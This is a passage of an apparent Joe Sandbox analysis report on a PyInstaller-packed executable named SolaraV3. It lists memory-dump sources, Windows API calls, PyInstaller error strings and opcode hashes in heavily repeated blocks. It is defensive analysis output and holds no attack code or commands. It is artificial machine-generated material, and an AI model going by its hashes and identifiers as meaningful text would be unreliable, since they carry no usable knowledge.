                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction ID: 7d2efa3e56b21f8a086696df1f452fb08cc197e285ca4e21af46f31a94ce5cdf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D18032A0874986EB20DF26D4413AD77B4FB55798F100136EE8D97B96DF3AE4A2D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6DC702D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction ID: cfd60cbe75411257a8d0a185084403d822d742e250b1b9291541c7ddb6f9d44a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C831D623708A4546E721AB26B8102AF66A1BF88799F410137EF4ED3B59DF3DD557C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD4D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD5B
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD85
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDF3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction ID: e0a2312b60a5bac6d4238bef9f6bac598989c5c65bdd497a9777e53801983b32
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9310521B1A74AD1EE229B03A4116BD63A4FF18BA0F494137ED1E87380DF3DE062D304
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                              • Instruction ID: 3059dc2f01a71683287ed9c1200bdf705e85bf689016b3d0645b35dcdfb4a902
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D418121B18A8F91EA21DB26E4252ED6325FF54340F800133EA5D876D5EF3DE62BD740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6DC70351A,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC702AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction ID: 99a65243a18f80446305b0d7d622b58de2353c1983ade51469d38b1ea24c56d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21B272A18B8542E7209B55F8517EAA3A4FB883C4F400137FE8D83659DF3CD1568740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                              • Instruction ID: 5d33a0b0013c490226e7d7751f4eb25a233001fb05fab278941ab6e8e72b7e22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA219D30F0C64A86FA6963399A7113DA2425F447F0F116736E93EC7AC6DE2CB4639300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction ID: e0eb0081e8cb1c4685abdfb09c0e79dca2cc258b0cd8ac2bead7fa3454d9d654
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E211B921B18B4986E7608B52F85532DA3A0FB88FE4F044235E96EC7794DF3CD8258740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708EFD
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708F5A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708FE5
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709044
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709055
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC70906A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                              • Instruction ID: f4adc7efcbf92c2efcfbd135f9b0ccb1762818622b6cbbf5b503a55482c01894
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44418F62A1968A81EA309B13E5002BE73A4FB85BC4F444136DF9D97799DE3EE523D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B2D7
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B30D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B33A
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B34B
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B35C
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B377
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                              • Instruction ID: 3ba90b57abc033802a6f73968ec955b1af2912bec75d2ea29a7ab1daa42ad204
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14116030F0C68A86FA585729566113D62429F447F0F146736E83EC76D6DE2CA4738300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction ID: 52007a145e6001d1a4f92277134af69f6b3d16f96283a07eddd00bc2d0bec1bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D31F623B18A8956E7209766A8512EF66A4BF887D4F400133FE8DD3789EF3CD1578700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                              • Instruction ID: f87a8971a6a07dffa7b8405072eba2ab3beb5a87b21ef52bd23ffd51ff5ec390
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1317372A19A8689EB20DF25E8652FD6360FF88784F540136EA4E87B99DF3CD116C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6DC70918F,?,00007FF6DC703C55), ref: 00007FF6DC702BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6DC702C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction ID: 4d3c1e3fea9780c66f6163453185013722541ed139eca782b23bf3d1631b11b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21DE62708B8582E7219B15F8907EE63A4FB88784F400136EA8D93659DE3CE266C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6DC701B99), ref: 00007FF6DC702760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction ID: 3d73c88f342bad0709f15477228df80d71bb404cafae940d004e271bdf60c224
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52219272A18B8946E720DB55F8517EAA3A4FB88384F400136FE8D93659DF7CD15A8740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
